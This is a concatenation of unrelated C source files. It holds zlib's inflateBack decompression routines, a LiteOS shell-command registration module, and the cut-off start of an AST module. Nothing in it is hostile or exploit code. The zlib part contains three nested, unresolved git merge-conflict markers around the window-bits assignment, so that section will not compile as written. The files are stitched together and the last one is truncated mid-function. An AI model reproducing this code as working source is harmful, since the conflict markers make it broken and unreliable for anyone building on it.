strm; int windowBits; unsigned char FAR *window; const char *version; int stream_size; { struct inflate_state FAR *state; if (version == Z_NULL || version[0] != ZLIB_VERSION[0] || stream_size != (int)(sizeof(z_stream))) return Z_VERSION_ERROR; if (strm == Z_NULL || window == Z_NULL || windowBits < 8 || windowBits > 15) return Z_STREAM_ERROR; strm->msg = Z_NULL; /* in case we return an error */ if (strm->zalloc == (alloc_func)0) { #ifdef Z_SOLO return Z_STREAM_ERROR; #else strm->zalloc = zcalloc; strm->opaque = (voidpf)0; #endif } if (strm->zfree == (free_func)0) #ifdef Z_SOLO return Z_STREAM_ERROR; #else strm->zfree = zcfree; #endif state = (struct inflate_state FAR *)ZALLOC(strm, 1, sizeof(struct inflate_state)); if (state == Z_NULL) return Z_MEM_ERROR; Tracev((stderr, "inflate: allocated\n")); strm->state = (struct internal_state FAR *)state; state->dmax = 32768U; <<<<<<< HEAD <<<<<<< HEAD <<<<<<< HEAD state->wbits = windowBits; ======= state->wbits = (uInt)windowBits; >>>>>>> upstream/master ======= state->wbits = (uInt)windowBits; >>>>>>> upstream/master ======= state->wbits = (uInt)windowBits; >>>>>>> upstream/master state->wsize = 1U << windowBits; state->window = window; state->wnext = 0; state->whave = 0; return Z_OK; } /* Return state with length and distance decoding tables and index sizes set to fixed code decoding. Normally this returns fixed tables from inffixed.h. If BUILDFIXED is defined, then instead this routine builds the tables the first time it's called, and returns those tables the first time and thereafter. This reduces the size of the code by about 2K bytes, in exchange for a little execution time. However, BUILDFIXED should not be used for threaded applications, since the rewriting of the tables and virgin may not be thread-safe. */ local void fixedtables(state) struct inflate_state FAR *state; { #ifdef BUILDFIXED static int virgin = 1; static code *lenfix, *distfix; static code fixed[544]; /* build fixed huffman tables if first call (may not be thread safe) */ if (virgin) { unsigned sym, bits; static code *next; /* literal/length table */ sym = 0; while (sym < 144) state->lens[sym++] = 8; while (sym < 256) state->lens[sym++] = 9; while (sym < 280) state->lens[sym++] = 7; while (sym < 288) state->lens[sym++] = 8; next = fixed; lenfix = next; bits = 9; inflate_table(LENS, state->lens, 288, &(next), &(bits), state->work); /* distance table */ sym = 0; while (sym < 32) state->lens[sym++] = 5; distfix = next; bits = 5; inflate_table(DISTS, state->lens, 32, &(next), &(bits), state->work); /* do this just once */ virgin = 0; } #else /* !BUILDFIXED */ # include "inffixed.h" #endif /* BUILDFIXED */ state->lencode = lenfix; state->lenbits = 9; state->distcode = distfix; state->distbits = 5; } /* Macros for inflateBack(): */ /* Load returned state from inflate_fast() */ #define LOAD() \ do { \ put = strm->next_out; \ left = strm->avail_out; \ next = strm->next_in; \ have = strm->avail_in; \ hold = state->hold; \ bits = state->bits; \ } while (0) /* Set state from registers for inflate_fast() */ #define RESTORE() \ do { \ strm->next_out = put; \ strm->avail_out = left; \ strm->next_in = next; \ strm->avail_in = have; \ state->hold = hold; \ state->bits = bits; \ } while (0) /* Clear the input bit accumulator */ #define INITBITS() \ do { \ hold = 0; \ bits = 0; \ } while (0) /* Assure that some input is available. If input is requested, but denied, then return a Z_BUF_ERROR from inflateBack(). */ #define PULL() \ do { \ if (have == 0) { \ have = in(in_desc, &next); \ if (have == 0) { \ next = Z_NULL; \ ret = Z_BUF_ERROR; \ goto inf_leave; \ } \ } \ } while (0) /* Get a byte of input into the bit accumulator, or return from inflateBack() with an error if there is no input available. */ #define PULLBYTE() \ do { \ PULL(); \ have--; \ hold += (unsigned long)(*next++) << bits; \ bits += 8; \ } while (0) /* Assure that there are at least n bits in the bit accumulator. If there is not enough available input to do that, then return from inflateBack() with an error. */ #define NEEDBITS(n) \ do { \ while (bits < (unsigned)(n)) \ PULLBYTE(); \ } while (0) /* Return the low n bits of the bit accumulator (n < 16) */ #define BITS(n) \ ((unsigned)hold & ((1U << (n)) - 1)) /* Remove n bits from the bit accumulator */ #define DROPBITS(n) \ do { \ hold >>= (n); \ bits -= (unsigned)(n); \ } while (0) /* Remove zero to seven bits as needed to go to a byte boundary */ #define BYTEBITS() \ do { \ hold >>= bits & 7; \ bits -= bits & 7; \ } while (0) /* Assure that some output space is available, by writing out the window if it's full. If the write fails, return from inflateBack() with a Z_BUF_ERROR. */ #define ROOM() \ do { \ if (left == 0) { \ put = state->window; \ left = state->wsize; \ state->whave = left; \ if (out(out_desc, put, left)) { \ ret = Z_BUF_ERROR; \ goto inf_leave; \ } \ } \ } while (0) /* strm provides the memory allocation functions and window buffer on input, and provides information on the unused input on return. For Z_DATA_ERROR returns, strm will also provide an error message. in() and out() are the call-back input and output functions. When inflateBack() needs more input, it calls in(). When inflateBack() has filled the window with output, or when it completes with data in the window, it calls out() to write out the data. The application must not change the provided input until in() is called again or inflateBack() returns. The application must not change the window/output buffer until inflateBack() returns. in() and out() are called with a descriptor parameter provided in the inflateBack() call. This parameter can be a structure that provides the information required to do the read or write, as well as accumulated information on the input and output such as totals and check values. in() should return zero on failure. out() should return non-zero on failure. If either in() or out() fails, than inflateBack() returns a Z_BUF_ERROR. strm->next_in can be checked for Z_NULL to see whether it was in() or out() that caused in the error. Otherwise, inflateBack() returns Z_STREAM_END on success, Z_DATA_ERROR for an deflate format error, or Z_MEM_ERROR if it could not allocate memory for the state. inflateBack() can also return Z_STREAM_ERROR if the input parameters are not correct, i.e. strm is Z_NULL or the state was not initialized. */ int ZEXPORT inflateBack(strm, in, in_desc, out, out_desc) z_streamp strm; in_func in; void FAR *in_desc; out_func out; void FAR *out_desc; { struct inflate_state FAR *state; z_const unsigned char FAR *next; /* next input */ unsigned char FAR *put; /* next output */ unsigned have, left; /* available input and output */ unsigned long hold; /* bit buffer */ unsigned bits; /* bits in bit buffer */ unsigned copy; /* number of stored or match bytes to copy */ unsigned char FAR *from; /* where to copy match bytes from */ code here; /* current decoding table entry */ code last; /* parent table entry */ unsigned len; /* length to copy for repeats, bits to drop */ int ret; /* return code */ static const unsigned short order[19] = /* permutation of code lengths */ {16, 17, 18, 0, 8, 7, 9, 6, 10, 5, 11, 4, 12, 3, 13, 2, 14, 1, 15}; /* Check that the strm exists and that the state was initialized */ if (strm == Z_NULL || strm->state == Z_NULL) return Z_STREAM_ERROR; state = (struct inflate_state FAR *)strm->state; /* Reset the state */ strm->msg = Z_NULL; state->mode = TYPE; state->last = 0; state->whave = 0; next = strm->next_in; have = next != Z_NULL ? strm->avail_in : 0; hold = 0; bits = 0; put = state->window; left = state->wsize; /* Inflate until end of block marked as last */ for (;;) switch (state->mode) { case TYPE: /* determine and dispatch block type */ if (state->last) { BYTEBITS(); state->mode = DONE; break; } NEEDBITS(3); state->last = BITS(1); DROPBITS(1); switch (BITS(2)) { case 0: /* stored block */ Tracev((stderr, "inflate: stored block%s\n", state->last ? " (last)" : "")); state->mode = STORED; break; case 1: /* fixed block */ fixedtables(state); Tracev((stderr, "inflate: fixed codes block%s\n", state->last ? " (last)" : "")); state->mode = LEN; /* decode codes */ break; case 2: /* dynamic block */ Tracev((stderr, "inflate: dynamic codes block%s\n", state->last ? " (last)" : "")); state->mode = TABLE; break; case 3: strm->msg = (char *)"invalid block type"; state->mode = BAD; } DROPBITS(2); break; case STORED: /* get and verify stored block length */ BYTEBITS(); /* go to byte boundary */ NEEDBITS(32); if ((hold & 0xffff) != ((hold >> 16) ^ 0xffff)) { strm->msg = (char *)"invalid stored block lengths"; state->mode = BAD; break; } state->length = (unsigned)hold & 0xffff; Tracev((stderr, "inflate: stored length %u\n", state->length)); INITBITS(); /* copy stored block from input to output */ while (state->length != 0) { copy = state->length; PULL(); ROOM(); if (copy > have) copy = have; if (copy > left) copy = left; zmemcpy(put, next, copy); have -= copy; next += copy; left -= copy; put += copy; state->length -= copy; } Tracev((stderr, "inflate: stored end\n")); state->mode = TYPE; break; case TABLE: /* get dynamic table entries descriptor */ NEEDBITS(14); state->nlen = BITS(5) + 257; DROPBITS(5); state->ndist = BITS(5) + 1; DROPBITS(5); state->ncode = BITS(4) + 4; DROPBITS(4); #ifndef PKZIP_BUG_WORKAROUND if (state->nlen > 286 || state->ndist > 30) { strm->msg = (char *)"too many length or distance symbols"; state->mode = BAD; break; } #endif Tracev((stderr, "inflate: table sizes ok\n")); /* get code length code lengths (not a typo) */ state->have = 0; while (state->have < state->ncode) { NEEDBITS(3); state->lens[order[state->have++]] = (unsigned short)BITS(3); DROPBITS(3); } while (state->have < 19) state->lens[order[state->have++]] = 0; state->next = state->codes; state->lencode = (code const FAR *)(state->next); state->lenbits = 7; ret = inflate_table(CODES, state->lens, 19, &(state->next), &(state->lenbits), state->work); if (ret) { strm->msg = (char *)"invalid code lengths set"; state->mode = BAD; break; } Tracev((stderr, "inflate: code lengths ok\n")); /* get length and distance code code lengths */ state->have = 0; while (state->have < state->nlen + state->ndist) { for (;;) { here = state->lencode[BITS(state->lenbits)]; if ((unsigned)(here.bits) <= bits) break; PULLBYTE(); } if (here.val < 16) { DROPBITS(here.bits); state->lens[state->have++] = here.val; } else { if (here.val == 16) { NEEDBITS(here.bits + 2); DROPBITS(here.bits); if (state->have == 0) { strm->msg = (char *)"invalid bit length repeat"; state->mode = BAD; break; } len = (unsigned)(state->lens[state->have - 1]); copy = 3 + BITS(2); DROPBITS(2); } else if (here.val == 17) { NEEDBITS(here.bits + 3); DROPBITS(here.bits); len = 0; copy = 3 + BITS(3); DROPBITS(3); } else { NEEDBITS(here.bits + 7); DROPBITS(here.bits); len = 0; copy = 11 + BITS(7); DROPBITS(7); } if (state->have + copy > state->nlen + state->ndist) { strm->msg = (char *)"invalid bit length repeat"; state->mode = BAD; break; } while (copy--) state->lens[state->have++] = (unsigned short)len; } } /* handle error breaks in while */ if (state->mode == BAD) break; /* check for end-of-block code (better have one) */ if (state->lens[256] == 0) { strm->msg = (char *)"invalid code -- missing end-of-block"; state->mode = BAD; break; } /* build code tables -- note: do not change the lenbits or distbits values here (9 and 6) without reading the comments in inftrees.h concerning the ENOUGH constants, which depend on those values */ state->next = state->codes; state->lencode = (code const FAR *)(state->next); state->lenbits = 9; ret = inflate_table(LENS, state->lens, state->nlen, &(state->next), &(state->lenbits), state->work); if (ret) { strm->msg = (char *)"invalid literal/lengths set"; state->mode = BAD; break; } state->distcode = (code const FAR *)(state->next); state->distbits = 6; ret = inflate_table(DISTS, state->lens + state->nlen, state->ndist, &(state->next), &(state->distbits), state->work); if (ret) { strm->msg = (char *)"invalid distances set"; state->mode = BAD; break; } Tracev((stderr, "inflate: codes ok\n")); state->mode = LEN; case LEN: /* use inflate_fast() if we have enough input and output */ if (have >= 6 && left >= 258) { RESTORE(); if (state->whave < state->wsize) state->whave = state->wsize - left; inflate_fast(strm, state->wsize); LOAD(); break; } /* get a literal, length, or end-of-block code */ for (;;) { here = state->lencode[BITS(state->lenbits)]; if ((unsigned)(here.bits) <= bits) break; PULLBYTE(); } if (here.op && (here.op & 0xf0) == 0) { last = here; for (;;) { here = state->lencode[last.val + (BITS(last.bits + last.op) >> last.bits)]; if ((unsigned)(last.bits + here.bits) <= bits) break; PULLBYTE(); } DROPBITS(last.bits); } DROPBITS(here.bits); state->length = (unsigned)here.val; /* process literal */ if (here.op == 0) { Tracevv((stderr, here.val >= 0x20 && here.val < 0x7f ? "inflate: literal '%c'\n" : "inflate: literal 0x%02x\n", here.val)); ROOM(); *put++ = (unsigned char)(state->length); left--; state->mode = LEN; break; } /* process end of block */ if (here.op & 32) { Tracevv((stderr, "inflate: end of block\n")); state->mode = TYPE; break; } /* invalid code */ if (here.op & 64) { strm->msg = (char *)"invalid literal/length code"; state->mode = BAD; break; } /* length code -- get extra bits, if any */ state->extra = (unsigned)(here.op) & 15; if (state->extra != 0) { NEEDBITS(state->extra); state->length += BITS(state->extra); DROPBITS(state->extra); } Tracevv((stderr, "inflate: length %u\n", state->length)); /* get distance code */ for (;;) { here = state->distcode[BITS(state->distbits)]; if ((unsigned)(here.bits) <= bits) break; PULLBYTE(); } if ((here.op & 0xf0) == 0) { last = here; for (;;) { here = state->distcode[last.val + (BITS(last.bits + last.op) >> last.bits)]; if ((unsigned)(last.bits + here.bits) <= bits) break; PULLBYTE(); } DROPBITS(last.bits); } DROPBITS(here.bits); if (here.op & 64) { strm->msg = (char *)"invalid distance code"; state->mode = BAD; break; } state->offset = (unsigned)here.val; /* get distance extra bits, if any */ state->extra = (unsigned)(here.op) & 15; if (state->extra != 0) { NEEDBITS(state->extra); state->offset += BITS(state->extra); DROPBITS(state->extra); } if (state->offset > state->wsize - (state->whave < state->wsize ? left : 0)) { strm->msg = (char *)"invalid distance too far back"; state->mode = BAD; break; } Tracevv((stderr, "inflate: distance %u\n", state->offset)); /* copy match from window to output */ do { ROOM(); copy = state->wsize - state->offset; if (copy < left) { from = put + copy; copy = left - copy; } else { from = put - state->offset; copy = left; } if (copy > state->length) copy = state->length; state->length -= copy; left -= copy; do { *put++ = *from++; } while (--copy); } while (state->length != 0); break; case DONE: /* inflate stream terminated properly -- write leftover output */ ret = Z_STREAM_END; if (left < state->wsize) { if (out(out_desc, state->window, state->wsize - left)) ret = Z_BUF_ERROR; } goto inf_leave; case BAD: ret = Z_DATA_ERROR; goto inf_leave; default: /* can't happen, but makes compilers happy */ ret = Z_STREAM_ERROR; goto inf_leave; } /* Return unused input */ inf_leave: strm->next_in = next; strm->avail_in = have; return ret; } int ZEXPORT inflateBackEnd(strm) z_streamp strm; { if (strm == Z_NULL || strm->state == Z_NULL || strm->zfree == (free_func)0) return Z_STREAM_ERROR; ZFREE(strm, strm->state); strm->state = Z_NULL; Tracev((stderr, "inflate: end\n")); return Z_OK; }
584764.c
/* * Copyright (c) 2013-2019 Huawei Technologies Co., Ltd. All rights reserved. * Copyright (c) 2020-2021 Huawei Device Co., Ltd. All rights reserved. * * Redistribution and use in source and binary forms, with or without modification, * are permitted provided that the following conditions are met: * * 1. Redistributions of source code must retain the above copyright notice, this list of * conditions and the following disclaimer. * * 2. Redistributions in binary form must reproduce the above copyright notice, this list * of conditions and the following disclaimer in the documentation and/or other materials * provided with the distribution. * * 3. Neither the name of the copyright holder nor the names of its contributors may be used * to endorse or promote products derived from this software without specific prior written * permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, * THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR * CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF * ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ #include "shcmd.h" #include "show.h" #include "shmsg.h" #include "stdlib.h" #include "unistd.h" #include "dirent.h" #include "securec.h" #include "los_mux.h" #include "los_memory.h" #define SHELL_INIT_MAGIC_FLAG 0xABABABAB STATIC CmdModInfo cmdInfo; ShellCB *g_shellCB = NULL; CmdItem g_shellcmdAll[] = { {CMD_TYPE_STD, "date", XARGS, (CmdCallBackFunc)OsShellCmdDate}, {CMD_TYPE_EX, "task", 1, (CmdCallBackFunc)OsShellCmdDumpTask}, {CMD_TYPE_EX, "free", XARGS, (CmdCallBackFunc)OsShellCmdFree}, #ifdef LWIP_SHELLCMD_ENABLE {CMD_TYPE_EX, "ifconfig", XARGS, (CmdCallBackFunc)lwip_ifconfig}, {CMD_TYPE_EX, "ping", XARGS, (CmdCallBackFunc)OsShellPing}, #endif {CMD_TYPE_EX, "touch", XARGS, (CmdCallBackFunc)OsShellCmdTouch}, {CMD_TYPE_EX, "ls", XARGS, (CmdCallBackFunc)OsShellCmdLs}, {CMD_TYPE_EX, "pwd", XARGS, (CmdCallBackFunc)OsShellCmdPwd}, {CMD_TYPE_EX, "cd", XARGS, (CmdCallBackFunc)OsShellCmdCd}, {CMD_TYPE_EX, "cat", XARGS, (CmdCallBackFunc)OsShellCmdCat}, {CMD_TYPE_EX, "rm", XARGS, (CmdCallBackFunc)OsShellCmdRm}, {CMD_TYPE_EX, "rmdir", XARGS, (CmdCallBackFunc)OsShellCmdRmdir}, {CMD_TYPE_EX, "mkdir", XARGS, (CmdCallBackFunc)OsShellCmdMkdir}, {CMD_TYPE_EX, "cp", XARGS, (CmdCallBackFunc)OsShellCmdCp}, {CMD_TYPE_EX, "help", 0, (CmdCallBackFunc)OsShellCmdHelp}, }; CmdModInfo *OsCmdInfoGet(VOID) { return &cmdInfo; } /* * Description: Pass in the string and clear useless space ,which inlcude: * 1) The overmatch space which is not be marked by Quote's area * Squeeze the overmatch space into one space * 2) Clear all space before first vaild charatctor * Input: cmdKey : Pass in the buff string, which is ready to be operated * cmdOut : Pass out the buffer string ,which has already been operated * size : cmdKey length */ LITE_OS_SEC_TEXT_MINOR UINT32 OsCmdKeyShift(const CHAR *cmdKey, CHAR *cmdOut, UINT32 size) { CHAR *output = NULL; CHAR *outputBak = NULL; UINT32 len; INT32 ret; BOOL quotes = FALSE; if ((cmdKey == NULL) || (cmdOut == NULL)) { return (UINT32)OS_ERROR; } len = strlen(cmdKey); if (len >= size) { return (UINT32)OS_ERROR; } output = (CHAR*)LOS_MemAlloc(m_aucSysMem0, len + 1); if (output == NULL) { PRINTK("malloc failure in %s[%d]", __FUNCTION__, __LINE__); return (UINT32)OS_ERROR; } /* Backup the 'output' start address */ outputBak = output; /* Scan each charactor in 'cmdKey',and squeeze the overmuch space and ignore invaild charactor */ for (; *cmdKey != '\0'; cmdKey++) { /* Detected a Double Quotes, switch the matching status */ if (*(cmdKey) == '\"') { SWITCH_QUOTES_STATUS(quotes); } /* Ignore the current charactor in following situation */ /* 1) Quotes matching status is FALSE (which said that the space is not been marked by double quotes) */ /* 2) Current charactor is a space */ /* 3) Next charactor is a space too, or the string is been seeked to the end already(\0) */ /* 4) Invaild charactor, such as single quotes */ if ((*cmdKey == ' ') && ((*(cmdKey + 1) == ' ') || (*(cmdKey + 1) == '\0')) && QUOTES_STATUS_CLOSE(quotes)) { continue; } if (*cmdKey == '\'') { continue; } *output = *cmdKey; output++; } *output = '\0'; /* Restore the 'output' start address */ output = outputBak; len = strlen(output); /* Clear the space which is located at the first charactor in buffer */ if (*outputBak == ' ') { output++; len--; } /* Copy out the buffer which is been operated already */ ret = strncpy_s(cmdOut, size, output, len); if (ret != EOK) { PRINT_ERR("%s,%d strncpy_s failed, err:%d!\n", __FUNCTION__, __LINE__, ret); (VOID)LOS_MemFree(m_aucSysMem0, output); return OS_ERROR; } cmdOut[len] = '\0'; (VOID)LOS_MemFree(m_aucSysMem0, output); return LOS_OK; } LITE_OS_SEC_TEXT_MINOR BOOL OsCmdKeyCheck(const CHAR *cmdKey) { const CHAR *temp = cmdKey; enum Stat { STAT_NONE, STAT_DIGIT, STAT_OTHER } state = STAT_NONE; if (strlen(cmdKey) >= CMD_KEY_LEN) { return FALSE; } while (*temp != '\0') { if (!((*temp <= '9') && (*temp >= '0')) && !((*temp <= 'z') && (*temp >= 'a')) && !((*temp <= 'Z') && (*temp >= 'A')) && (*temp != '_') && (*temp != '-')) { return FALSE; } if ((*temp >= '0') && (*temp <= '9')) { if (state == STAT_NONE) { state = STAT_DIGIT; } } else { state = STAT_OTHER; } temp++; } if (state == STAT_DIGIT) { return FALSE; } return TRUE; } LITE_OS_SEC_TEXT_MINOR VOID OsCmdAscendingInsert(CmdItemNode *cmd) { CmdItemNode *cmdItem = NULL; CmdItemNode *cmdNext = NULL; if (cmd == NULL) { return; } for (cmdItem = LOS_DL_LIST_ENTRY((&cmdInfo.cmdList.list)->pstPrev, CmdItemNode, list); &cmdItem->list != &(cmdInfo.cmdList.list); ) { cmdNext = LOS_DL_LIST_ENTRY(cmdItem->list.pstPrev, CmdItemNode, list); if (&cmdNext->list != &(cmdInfo.cmdList.list)) { if ((strncmp(cmdItem->cmd->cmdKey, cmd->cmd->cmdKey, strlen(cmd->cmd->cmdKey)) >= 0) && (strncmp(cmdNext->cmd->cmdKey, cmd->cmd->cmdKey, strlen(cmd->cmd->cmdKey)) < 0)) { LOS_ListTailInsert(&(cmdItem->list), &(cmd->list)); return; } cmdItem = cmdNext; } else { if (strncmp(cmd->cmd->cmdKey, cmdItem->cmd->cmdKey, strlen(cmd->cmd->cmdKey)) > 0) { cmdItem = cmdNext; } break; } } LOS_ListTailInsert(&(cmdItem->list), &(cmd->list)); } LITE_OS_SEC_TEXT_MINOR UINT32 OsShellKeyInit(ShellCB *shellCB) { CmdKeyLink *cmdKeyLink = NULL; CmdKeyLink *cmdHistoryLink = NULL; if (shellCB == NULL) { return OS_ERROR; } cmdKeyLink = (CmdKeyLink *)LOS_MemAlloc(m_aucSysMem0, sizeof(CmdKeyLink)); if (cmdKeyLink == NULL) { PRINT_ERR("Shell CmdKeyLink memory alloc error!\n"); return OS_ERROR; } cmdHistoryLink = (CmdKeyLink *)LOS_MemAlloc(m_aucSysMem0, sizeof(CmdKeyLink)); if (cmdHistoryLink == NULL) { (VOID)LOS_MemFree(m_aucSysMem0, cmdKeyLink); PRINT_ERR("Shell CmdHistoryLink memory alloc error!\n"); return OS_ERROR; } cmdKeyLink->count = 0; LOS_ListInit(&(cmdKeyLink->list)); shellCB->cmdKeyLink = (VOID *)cmdKeyLink; cmdHistoryLink->count = 0; LOS_ListInit(&(cmdHistoryLink->list)); shellCB->cmdHistoryKeyLink = (VOID *)cmdHistoryLink; shellCB->cmdMaskKeyLink = (VOID *)cmdHistoryLink; return LOS_OK; } LITE_OS_SEC_TEXT_MINOR VOID OsShellKeyDeInit(CmdKeyLink *cmdKeyLink) { CmdKeyLink *cmdtmp = NULL; if (cmdKeyLink == NULL) { return; } while (!LOS_ListEmpty(&(cmdKeyLink->list))) { cmdtmp = LOS_DL_LIST_ENTRY(cmdKeyLink->list.pstNext, CmdKeyLink, list); LOS_ListDelete(&cmdtmp->list); (VOID)LOS_MemFree(m_aucSysMem0, cmdtmp); } cmdKeyLink->count = 0; (VOID)LOS_MemFree(m_aucSysMem0, cmdKeyLink); } LITE_OS_SEC_TEXT_MINOR UINT32 OsShellSysCmdRegister(VOID) { UINT32 i; UINT8 *cmdItemGroup = NULL; UINT32 index = sizeof(g_shellcmdAll) / sizeof(CmdItem); CmdItemNode *cmdItem = NULL; cmdItemGroup = (UINT8 *)LOS_MemAlloc(m_aucSysMem0, index * sizeof(CmdItemNode)); if (cmdItemGroup == NULL) { PRINT_ERR("[%s]System memory allocation failure!\n", __FUNCTION__); return (UINT32)OS_ERROR; } for (i = 0; i < index; ++i) { cmdItem = (CmdItemNode *)(cmdItemGroup + i * sizeof(CmdItemNode)); cmdItem->cmd = &g_shellcmdAll[i]; OsCmdAscendingInsert(cmdItem); } cmdInfo.listNum += index; return LOS_OK; } LITE_OS_SEC_TEXT_MINOR UINT32 OsCmdExec(CmdParsed *cmdParsed) { UINT32 ret; CmdCallBackFunc cmdHook = NULL; CmdItemNode *curCmdItem = NULL; UINT32 i; const CHAR *cmdKey = NULL; if (cmdParsed == NULL) { return (UINT32)OS_ERROR; } LOS_DL_LIST_FOR_EACH_ENTRY(curCmdItem, &(cmdInfo.cmdList.list), CmdItemNode, list) { cmdKey = curCmdItem->cmd->cmdKey; if ((cmdParsed->cmdType == curCmdItem->cmd->cmdType) && (strlen(cmdKey) == strlen(cmdParsed->cmdKeyword)) && (strncmp(cmdKey, (CHAR *)(cmdParsed->cmdKeyword), strlen(cmdKey)) == 0)) { cmdHook = curCmdItem->cmd->cmdHook; break; } } ret = OS_ERROR; if (cmdHook != NULL) { ret = (cmdHook)(cmdParsed->paramCnt, (const CHAR **)cmdParsed->paramArray); } OUT: for (i = 0; i < cmdParsed->paramCnt; i++) { if (cmdParsed->paramArray[i] != NULL) { (VOID)LOS_MemFree(m_aucSysMem0, cmdParsed->paramArray[i]); cmdParsed->paramArray[i] = NULL; } } return (UINT32)ret; } ShellCB *OsGetShellCb(VOID) { return g_shellCB; } CHAR *OsShellGetWorkingDirtectory(VOID) { return OsGetShellCb()->shellWorkingDirectory; } VOID OsShellCBInit(VOID) { INT32 ret; ShellCB *shellCB = NULL; shellCB = (ShellCB *)malloc(sizeof(ShellCB)); if (shellCB == NULL) { goto ERR_OUT1; } ret = memset_s(shellCB, sizeof(ShellCB), 0, sizeof(ShellCB)); if (ret != SH_OK) { goto ERR_OUT1; } ret = (INT32)OsShellKeyInit(shellCB); if (ret != SH_OK) { goto ERR_OUT1; } (VOID)strncpy_s(shellCB->shellWorkingDirectory, PATH_MAX, "/", 2); /* 2:space for "/" */ g_shellCB = shellCB; return; ERR_OUT1: (VOID)free(shellCB); return; } LITE_OS_SEC_TEXT_MINOR UINT32 OsCmdInit(VOID) { UINT32 ret; LOS_ListInit(&(cmdInfo.cmdList.list)); cmdInfo.listNum = 0; cmdInfo.initMagicFlag = SHELL_INIT_MAGIC_FLAG; ret = LOS_MuxCreate(&cmdInfo.muxLock); if (ret != LOS_OK) { PRINT_ERR("Create mutex for shell cmd info failed\n"); return OS_ERROR; } OsShellCBInit(); return LOS_OK; } STATIC UINT32 OsCmdItemCreate(CmdType cmdType, const CHAR *cmdKey, UINT32 paraNum, CmdCallBackFunc cmdProc) { CmdItem *cmdItem = NULL; CmdItemNode *cmdItemNode = NULL; cmdItem = (CmdItem *)LOS_MemAlloc(m_aucSysMem0, sizeof(CmdItem)); if (cmdItem == NULL) { return OS_ERRNO_SHELL_CMDREG_MEMALLOC_ERROR; } (VOID)memset_s(cmdItem, sizeof(CmdItem), '\0', sizeof(CmdItem)); cmdItemNode = (CmdItemNode *)LOS_MemAlloc(m_aucSysMem0, sizeof(CmdItemNode)); if (cmdItemNode == NULL) { (VOID)LOS_MemFree(m_aucSysMem0, cmdItem); return OS_ERRNO_SHELL_CMDREG_MEMALLOC_ERROR; } (VOID)memset_s(cmdItemNode, sizeof(CmdItemNode), '\0', sizeof(CmdItemNode)); cmdItemNode->cmd = cmdItem; cmdItemNode->cmd->cmdHook = cmdProc; cmdItemNode->cmd->paraNum = paraNum; cmdItemNode->cmd->cmdType = cmdType; cmdItemNode->cmd->cmdKey = cmdKey; (VOID)LOS_MuxPend(cmdInfo.muxLock, LOS_WAIT_FOREVER); OsCmdAscendingInsert(cmdItemNode); cmdInfo.listNum++; (VOID)LOS_MuxPost(cmdInfo.muxLock); return LOS_OK; } /* open API */ LITE_OS_SEC_TEXT_MINOR UINT32 osCmdReg(CmdType cmdType, const CHAR *cmdKey, UINT32 paraNum, CmdCallBackFunc cmdProc) { CmdItemNode *cmdItemNode = NULL; (VOID)LOS_MuxPend(cmdInfo.muxLock, LOS_WAIT_FOREVER); if (cmdInfo.initMagicFlag != SHELL_INIT_MAGIC_FLAG) { (VOID)LOS_MuxPost(cmdInfo.muxLock); PRINT_ERR("[%s] shell is not yet initialized!\n", __FUNCTION__); return OS_ERRNO_SHELL_NOT_INIT; } (VOID)LOS_MuxPost(cmdInfo.muxLock); if ((cmdProc == NULL) || (cmdKey == NULL) || (cmdType >= CMD_TYPE_BUTT) || (strlen(cmdKey) >= CMD_KEY_LEN) || !strlen(cmdKey)) { return OS_ERRNO_SHELL_CMDREG_PARA_ERROR; } if (paraNum > CMD_MAX_PARAS) { if (paraNum != XARGS) { return OS_ERRNO_SHELL_CMDREG_PARA_ERROR; } } if (OsCmdKeyCheck(cmdKey) != TRUE) { return OS_ERRNO_SHELL_CMDREG_CMD_ERROR; } (VOID)LOS_MuxPend(cmdInfo.muxLock, LOS_WAIT_FOREVER); LOS_DL_LIST_FOR_EACH_ENTRY(cmdItemNode, &(cmdInfo.cmdList.list), CmdItemNode, list) { if ((cmdType == cmdItemNode->cmd->cmdType) && ((strlen(cmdKey) == strlen(cmdItemNode->cmd->cmdKey)) && (strncmp((CHAR *)(cmdItemNode->cmd->cmdKey), cmdKey, strlen(cmdKey)) == 0))) { (VOID)LOS_MuxPost(cmdInfo.muxLock); return OS_ERRNO_SHELL_CMDREG_CMD_EXIST; } } (VOID)LOS_MuxPost(cmdInfo.muxLock); return OsCmdItemCreate(cmdType, cmdKey, paraNum, cmdProc); }
682847.c
/* ast.c */ #include <stdlib.h> #include <string.h> #include <stdio.h> #include "ast.h" struct fh_ast *fh_new_ast(struct fh_symtab *file_names) { struct fh_ast *ast = malloc(sizeof(struct fh_ast)); if (! ast) return NULL; ast->func_list = NULL; ast->file_names = file_names; fh_init_symtab(&ast->symtab); fh_init_buffer(&ast->string_pool); return ast; } void fh_free_ast(struct fh_ast *ast) { fh_free_named_func_list(ast->func_list); fh_destroy_buffer(&ast->string_pool); fh_destroy_symtab(&ast->symtab); free(ast); } const char *fh_get_ast_symbol(struct fh_ast *ast, fh_symbol_id id) { return fh_get_symbol_name(&ast->symtab, id); } const char *fh_get_ast_string(struct fh_ast *ast, fh_string_id id) { return ast->string_pool.p + id; } fh_symbol_id fh_add_ast_file_name(struct fh_ast *ast, const char *filename) { return fh_add_symbol(ast->file_names, filename); } const char *fh_get_ast_file_name(struct fh_ast *ast, fh_symbol_id file_id) { return fh_get_symbol_name(ast->file_names, file_id); } /* node creation */ struct fh_p_named_func *fh_new_named_func(struct fh_ast *ast, struct fh_src_loc loc) { UNUSED(ast); struct fh_p_named_func *func = malloc(sizeof(struct fh_p_named_func)); func->next = NULL; func->loc = loc; return func; } struct fh_p_expr *fh_new_expr(struct fh_ast *ast, struct 